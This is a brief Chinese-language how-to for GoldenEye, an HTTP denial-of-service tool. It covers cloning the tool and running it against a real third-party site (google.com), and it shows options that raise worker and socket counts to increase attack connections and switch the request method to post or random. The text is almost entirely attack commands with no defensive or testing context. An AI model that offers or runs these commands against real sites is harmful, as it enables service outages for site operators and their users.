GoldenEye 是一個 HTTP 的 DoS 工具,GoldenEye 的特性是會持續性的與目標建立連線,並且 Keep Alive + NoCache
GoldenEye 支援 L7 的攻擊,並且可以選擇使用 get 或是 post 甚至是 random(隨機) 的方式去進行攻擊
安裝並下載 GoldenEye
$ git clone https://github.com/jseidl/GoldenEye.git Initialized empty Git repository in /home/GoldenEye/.git/ $ ls goldeneye.py README.md res util
GoldenEye 的使用
一般使用方式
$ ./goldeneye.py http://www.google.com
增加 worker & sockes 使攻擊連線增加
$ ./goldeneye.py http://www.google.com -w 100 -s 1000
改變攻擊方式為 post,也可以用 random
$ ./goldeneye.py http://www.google.com -w 100 -s 1000 -m post